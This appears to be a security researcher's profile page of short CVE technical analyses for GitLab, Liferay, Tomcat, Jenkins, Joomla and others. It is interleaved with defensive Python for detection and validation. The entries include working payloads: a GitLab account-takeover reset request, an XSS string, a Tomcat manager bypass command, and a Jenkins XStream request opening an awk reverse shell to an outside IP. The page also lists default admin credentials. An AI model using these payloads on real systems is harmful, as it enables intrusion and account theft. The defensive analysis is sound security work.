noraj (98)
Last Login: January 25, 2024
noraj's Latest (20) Contributions
Technical Analysis
Tested on Gitlab CE 16.6.1. Very effective and easy to exploit. In the following payload the brackets MUST be URL encoded, else it won’t work:
user[email][]=victim@example.org&user[email][]=attacker@example.org
POST /users/password HTTP/2
Host: gitlab.example.org
...
authenticity_token=<auto_generated_token>&user%5Bemail%5D%5B%5D=victim%40example.org&user%5Bemail%5D%5B%5D=attacker%40example.org
Note that you must know the email address and not the login name.
See here for vulnerable and patched versions.
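The payload above relies on Rails-style nested parameters: a repeated `user[email][]` key is parsed into an array rather than a single string. The following Python is an added example, not code from the post or from GitLab, that re-implements that parsing rule, applies the defensive check a password-reset handler needs (exactly one email, as a plain string), and runs it over a few constructed request-log lines. The log format, `parse_nested_query`, `email_param_is_single_string` and `flag_multi_email_resets` are all assumptions made here.

```python
import re
from urllib.parse import parse_qsl

# Matches "name", "name[sub]", "name[sub][]" ... (key syntax used by Rack/Rails)
_BRACKET_RE = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")


def _assign(container: dict, keys: list, value: str) -> None:
    """Create/walk the nested structure for one key path and store value."""
    key, rest = keys[0], keys[1:]
    if not rest:                       # plain scalar: a=1
        container[key] = value
        return
    if rest[0] == "":                  # trailing []: append to a list
        container.setdefault(key, [])
        if not isinstance(container[key], list):
            raise ValueError(f"conflicting types for parameter {key!r}")
        container[key].append(value)
        return
    container.setdefault(key, {})      # a[b]...: descend into a hash
    if not isinstance(container[key], dict):
        raise ValueError(f"conflicting types for parameter {key!r}")
    _assign(container[key], rest, value)


def parse_nested_query(body: str) -> dict:
    """Parse a form-urlencoded body into nested dict/list values, mimicking
    Rack's rules: a[b]=1 -> {'a': {'b': '1'}}, a[]=1&a[]=2 -> {'a': ['1','2']}.
    parse_qsl percent-decodes keys, so %5B/%5D arrive here as brackets."""
    params: dict = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        m = _BRACKET_RE.match(raw_key)
        if not m:
            continue
        keys = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        _assign(params, keys, value)
    return params


def email_param_is_single_string(params: dict) -> bool:
    """Hardened check: the reset request must carry one email as a string,
    never a list (user[email][]) or a hash (user[email][x])."""
    user = params.get("user")
    if not isinstance(user, dict):
        return False
    email = user.get("email")
    return isinstance(email, str) and email != ""


# Constructed sample log lines ("METHOD PATH BODY"); not real GitLab logs.
CONSTRUCTED_REQUEST_LOG = [
    "POST /users/password user%5Bemail%5D=alice%40example.org",
    "POST /users/password user%5Bemail%5D%5B%5D=victim%40example.org"
    "&user%5Bemail%5D%5B%5D=attacker%40example.org",
    "POST /users/sign_in user%5Blogin%5D=bob&user%5Bpassword%5D=x",
]


def flag_multi_email_resets(lines: list) -> list:
    """Return the email parameter of every password-reset POST whose email
    was not a single string (the shape the exploit above depends on)."""
    flagged = []
    for line in lines:
        method, path, body = line.split(" ", 2)
        if method != "POST" or path != "/users/password":
            continue
        params = parse_nested_query(body)
        if not email_param_is_single_string(params):
            user = params.get("user")
            flagged.append(user.get("email") if isinstance(user, dict) else None)
    return flagged


if __name__ == "__main__":
    print(flag_multi_email_resets(CONSTRUCTED_REQUEST_LOG))
```

The same idea applies to any Rack-based app: a strong-parameters declaration that permits `:email` as a scalar rejects the array form, and a log search for more than one `user%5Bemail%5D%5B%5D` in a single `/users/password` body is a cheap retrospective detection.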
Technical Analysis
This can be used to recover secret information (QR codes, passwords, etc.) from an image cropped with the Microsoft Windows Snipping Tool, abusing the Acropalypse vulnerability.
There are some limitations:
- Useful only if the cropped information is sensitive
- Limited to the vulnerable screenshot software
- Must be cropped
- Patched by Microsoft
Technical Analysis
Additional information by the reporter at https://liferay.atlassian.net/browse/LPE-17093
Steps to reproduce
- Start vanilla 7.0.x/7.1.x/7.2.x
- create a site team with title:
<b onmouseover=alert(document.location)>Test</b>
- Click into the Team
- click + to add new member
- In the popup, hover onto ‘Test’ in the title: “Add New User to Test”
Actual result: XSS popup
Expected: no XSS
Reproduced on:
- 7.0.x Commit: f0ea5eb8945bd8bd20736d6aff0a5a6e748f5051
- 7.2.x Commit: 774c13baf1149336f7011318c0766e1dd0c4270f (https://github.com/liferay/liferay-portal/commit/774c13baf1149336f7011318c0766e1dd0c4270f)
- master private Commit: c379f2a0f2204cf2ded7688e367ef69d72919485
Technical Analysis
Additional information added by the discoverer at https://liferay.atlassian.net/browse/LPE-17022
Steps to reproduce:
- Create a Web Content Folder Folder1
- Configure Folder1 with Workflow Single Approver
- Create a Web Content WC1 in Folder1
- Go to Notifications
- Copy the link of the new notification.
- Replace the value of the redirect parameter with http%3A%2F%2Fwww.liferay.com
Expected result:
- The user is not redirected to a page within https://www.liferay.com/
Actual result:
- The user is redirected to a page within https://www.liferay.com/
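The report above is a classic open redirect: the `redirect` parameter is followed to an arbitrary external host. The following Python is an added example, not Liferay code, showing the validation a redirect handler should apply before honouring such a parameter. It covers the edge cases that commonly slip past naive checks: percent-encoded absolute URLs (as in the repro step), protocol-relative `//host` targets, backslash variants, and non-HTTP schemes. The function names and the allowed host `portal.example.org` are assumptions made here.

```python
from urllib.parse import urlsplit, unquote


def is_safe_redirect(target: str, allowed_hosts: set) -> bool:
    """Return True only when target is a same-site relative path or an
    absolute http(s) URL whose host is explicitly allowed."""
    if not target:
        return False
    # Redirect parameters usually arrive percent-encoded (http%3A%2F%2F...);
    # decode once so the scheme check sees the real value.
    candidate = unquote(target)
    # Browsers treat "\" like "/" in URLs, so "/\evil.example" would become
    # "//evil.example"; normalise before parsing rather than after.
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme:                        # absolute URL (or javascript:, data:, ...)
        return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts
    if parts.netloc:                        # protocol-relative: //evil.example/...
        return parts.hostname in allowed_hosts
    # Relative path: must start with exactly one slash.
    return candidate.startswith("/") and not candidate.startswith("//")


def safe_redirect_or_default(target: str, allowed_hosts: set, default: str = "/") -> str:
    """Resolve the redirect the way a handler should: honour it only if safe,
    otherwise fall back to a fixed in-site location."""
    return target if is_safe_redirect(target, allowed_hosts) else default


if __name__ == "__main__":
    allowed = {"portal.example.org"}        # constructed: this portal's own host
    for t in ("/group/guest/home", "http%3A%2F%2Fwww.liferay.com", "//www.liferay.com/"):
        print(t, "->", safe_redirect_or_default(t, allowed))
```

An allowlist of hosts (or, simpler still, accepting only relative paths) is the mitigation; a denylist of known bad hosts is not, because the attacker chooses the host. Double-encoded input (`http%253A...`) stays rejected by this logic because after a single decode it parses as a relative path that does not begin with `/`.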
Technical Analysis
The XXE is in a function (Xml::parse) that is part of the core library but is not used directly in the CMS. So to be vulnerable, one has to have made a custom page or installed an extension using this vulnerable function.
Else it’s pretty handy and is present in nearly all versions of the CMS until the patch.
Technical Analysis
Versions of Dell EMC iDRAC8 or Dell EMC iDRAC9 prior to 2.83.83.83/5.10.30.00 are vulnerable to this. Dell advisory.
Technical Analysis
It should be easy to exploit but there is no known public exploit.
Technical Analysis
It’s hard to find an SH4 architecture gcc compilation toolchain outside of Debian / Ubuntu. Cross compilation makes it difficult to compile the payload.
Technical Analysis
Useful to access the Tomcat manager, which is normally exposed only on localhost, e.g.
curl http://example.org/..\;/manager/html --path-as-is
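The request above works because a front-end rule that matches the raw path string (`/manager/...`) sees `/..\;/manager/html` as something else, while Tomcat strips the `;` path parameter, treats `\` as a separator and resolves `..`, ending up at `/manager/html`. The following Python is an added example, not from the post or from Tomcat, that canonicalises a path the way the back end effectively does and compares the result with a naive prefix rule over a few constructed access-log lines. The protected prefixes, log format and function names are assumptions made here.

```python
from urllib.parse import unquote

PROTECTED = ("manager", "host-manager")   # constructed: first path segments to guard


def canonical_segments(raw_path: str) -> list:
    """Normalise a request path like a lenient servlet container does:
    percent-decode once, treat '\\' as '/', drop ';param' suffixes from each
    segment, and resolve '.' and '..'. Returns the remaining segments."""
    decoded = unquote(raw_path).replace("\\", "/")
    out = []
    for seg in decoded.split("/"):
        seg = seg.split(";", 1)[0]         # ';jsessionid=...' style path parameters
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return out


def naive_prefix_block(raw_path: str, prefixes: tuple = PROTECTED) -> bool:
    """What a string-prefix rule at a reverse proxy effectively checks."""
    return any(raw_path.startswith("/" + p) for p in prefixes)


def canonical_block(raw_path: str, prefixes: tuple = PROTECTED) -> bool:
    """The same rule applied to the canonicalised path instead."""
    segs = canonical_segments(raw_path)
    return bool(segs) and segs[0] in prefixes


# Constructed sample access-log lines ("METHOD PATH STATUS"), not real logs.
CONSTRUCTED_ACCESS_LOG = [
    "GET /manager/html 403",
    "GET /..\\;/manager/html 200",
    "GET /app/%2e%2e/manager/html 200",
    "GET /app/index.jsp 200",
]


def proxy_bypass_candidates(lines: list) -> list:
    """Paths that the canonical rule would block but the naive rule let through:
    exactly the requests worth alerting on (or blocking) at the edge."""
    hits = []
    for line in lines:
        _method, path, _status = line.split(" ")
        if canonical_block(path) and not naive_prefix_block(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print(proxy_bypass_candidates(CONSTRUCTED_ACCESS_LOG))
```

The durable fix is not a better regex at the proxy but removing the assumption: either the manager application is not deployed, or Tomcat itself restricts it (a `RemoteAddrValve` on the manager context or `allowBackslash`/path-parameter handling left at their strict defaults), so that normalisation differences between the two tiers no longer matter.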
Technical Analysis
It’s easy to weaponize, even manually but there are dozens of exploits available. There is a TryHackMe room about CVE-2022-26134 to practice in a lab environment.
Technical Analysis
Despite the CVE being registered for WordPress, fckeditor is embedded in many CMS or custom applications and as such can impact more applications. However, fckeditor provides connectors for ASP, PHP, etc. but not JSP for example. So a Java app using fckeditor may not be vulnerable even with a vulnerable fckeditor.
Technical Analysis
There are at least two ways to achieve RCE.
Vector n°1
It leaks the MySQL credentials; in default and most common configurations MySQL will be exposed only on 127.0.0.1, which makes the attack ineffective. But if the database is exposed publicly, the attacker can change the Joomla! Super User’s password. The attacker logs in to the administrative web interface and modifies a template to include a webshell or installs a malicious plugin.
Vector n°2
It leaks the Joomla user database (usernames, emails, assigned group). The attacker can target a Super User and try bruteforce or credential stuffing, then follow the previously showcased paths to code execution.
Technical Analysis
It has been proven working well on production domains (cf. https://twitter.com/an0n_r0/status/1589405818885398528). kpasswd support is being implemented in impacket and the vuln will be exploitable with ticketer.
Note: this vulnerability concerns Samba AD and not MS AD.
Technical Analysis
This vulnerability is old now and targets old versions of Rails. But if you face such an app it’s really easy to get RCE using an existing PoC. However, editing the YAML manually can be difficult because it’s very space sensitive.
Technical Analysis
It’s easy to get RCE with a Groovy payload. Your code will be executed even if you receive an HTTP 500 error.
Example of request / payload:
POST /createItem?name=example HTTP/1.1
Host: example.org
Content-Length: 689
Content-Type: application/xml;
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>awk</string>
                <string>'BEGIN {s = "/inet/tcp/0/192.168.1.14/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'</string>
                <string>/dev/null</string>
              </command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>
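In an XStream document like the one above, element names and `class` attributes are Java class references, which is what makes the `ProcessBuilder`/`MethodClosure` chain reachable. The following Python is an added example, not from the post or from Jenkins, showing how a request filter or log analyser can enumerate those class references and reject bodies that name known gadget classes. The sample body is constructed here (same gadget shape, harmless `echo` command), the denylist is limited to the classes visible in the post, and the function names are assumptions made here.

```python
import xml.etree.ElementTree as ET

# Class names from the gadget chain shown in the post; a starting point,
# not an exhaustive list of dangerous XStream types.
DANGEROUS_CLASSES = {
    "java.lang.ProcessBuilder",
    "org.codehaus.groovy.runtime.MethodClosure",
    "groovy.util.Expando",
}

# Constructed sample request body: same structure as the post's payload,
# but the command is a harmless echo.
CONSTRUCTED_BODY = """<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command><string>echo</string><string>constructed-sample</string></command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>"""

# Constructed benign job definition for comparison.
BENIGN_BODY = "<project><description>constructed sample</description></project>"


def referenced_classes(xml_body: str) -> set:
    """Collect every class reference XStream would see: each element tag
    (XStream maps tag name to class) plus every 'class' attribute."""
    root = ET.fromstring(xml_body)
    refs = set()
    for el in root.iter():
        refs.add(el.tag)
        if "class" in el.attrib:
            refs.add(el.attrib["class"])
    return refs


def dangerous_references(xml_body: str) -> set:
    """Subset of referenced classes that are on the denylist."""
    return referenced_classes(xml_body) & DANGEROUS_CLASSES


def should_reject(xml_body: str) -> bool:
    """Decision a filter would make; malformed XML is rejected rather than
    passed on, since the backend parser might be more lenient than ours."""
    try:
        return bool(dangerous_references(xml_body))
    except ET.ParseError:
        return True


if __name__ == "__main__":
    print(sorted(dangerous_references(CONSTRUCTED_BODY)))
    print(should_reject(BENIGN_BODY))
```

A denylist like this catches only the gadget classes you already know about; the robust fix for an endpoint that deserialises job configuration is an allowlist of the types a job config is expected to contain, with everything else refused. Note also that `xml.etree` resolves no external entities, which is the behaviour you want in a filter that inspects untrusted XML.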
Technical Analysis
The only file you can rely on for detection is /WEB-INF/web.xml, but to read something else you’ll have to know the directory structure, which is unlikely when you audit a client infrastructure. To achieve RCE you’ll be required to get file upload, which is also less likely. In many cases in real life it may end up not useful beyond proving the vulnerability exists.
There are still some chances you can read /RELEASE-NOTES.txt if you don’t have another means to know the version used.
If the application is deployed under an unguessable path it’s likely you won’t be able to go further, but if you can reach the app and browse it, you may be able to understand the paths and try to read the source code of the application.
Technical Analysis
IBM Integrated Management Module (IMM) has some default admin credentials (USERID / PASSW0RD). The default credentials work on the WebUI as well as on telnet and SSH, which are accessible by default. The vulnerability allows injecting system commands. However, the big tradeoff is that the exploit is not public.
Technical Analysis
It gives the GLPI version, the list of all plugins and their versions, and some system info like the database used and its version, sometimes the webserver engine, the PHP version and the list of all loaded PHP modules, and the OS distro and version plus the kernel name and version.